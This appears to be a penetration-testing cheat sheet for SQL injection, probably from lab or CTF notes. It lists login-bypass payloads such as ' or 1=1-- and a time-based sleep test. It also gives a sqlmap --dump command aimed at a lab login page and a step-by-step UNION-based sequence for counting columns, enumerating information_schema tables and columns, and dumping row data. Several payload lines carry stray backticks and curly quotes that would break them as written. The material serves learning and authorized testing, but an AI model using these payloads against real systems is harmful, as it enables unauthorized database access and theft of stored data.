Test Strings

"
'or 1=1
"or 1=1
or 1=1--
'or 1=1--
"or 1=1--
or 1=1#
'or 1=1#
"or
1=1#
or 1=1/*
'or 1=1/*
"or 1=1/*
or 1=1;%00
```	

‘or 1=1;%00

“or 1=1;%00

‘or’
”`

'or
'or'–
```	

‘or–

or a=a
”`

'or a=a
"or a=a
or a=a–
'or a=a —
```	

“or a=a–

or ‘a’=‘a’
”`

'or 'a'='a'
"or 'a'='a'
')or('a'='a'
")”a”=”a”
')'a'='a
'or”='
1' or '1'='1
' or 'abc'='abc';--
' or ' '=' ';--
' or 1=1;--

If any of these allow you to create an always true statement, or produce an error, it’s vulnerable.

Test via timing

```1' sleep(10) ;--```


## Exploit
The easy way out is if you can use sqlmap:
```bash
# Read help
sqlmap help
# Example
sudo sqlmap -u "http://10.10.10.7/checklogin.php" --dbms=MySQL --level=5 --risk=3 --data="myusername=admin&mypassword=test" --dump

Otherwise, hopefully you can see some output from the injection test… if so, the follow steps get you to the W.

Find number of columns

Inject union select NULL,NULL,... with more NULL statement until there is no error. The number of NULLs when there is no error, is the number of columns in the table.

Get Version or DBMS

Let n == Number of columns…
Inject union all select 1,2,n-1,@@version,n

Note: this may not be the vulnerable row! If this doesn’t work, and you have an error it should disclose the vulnerable column. If not, guess and check,

Check database we’re on

Inject union all select 1,2,n-1,database(),n

Note: this is DBMS dependant!

Get tables

Inject union select 1,2,n-1,group_concat(table_name),n from information_schema.tables%20 where table_schema=database()

Getting columns

Any table/row name you inject, needs to be converted to a char string, use waraxe’s tool.

Inject union select 1,2,n-1,group_concat(column_name),n from information_schema.columns where table_name=CHAR(100,101,118,95,97,99,99,111,117,110,116,115)

Getting data

Inject union select 1,2,n-1,group_concat(<rowname>,0x3a,<another_row_name>),n from <table_name>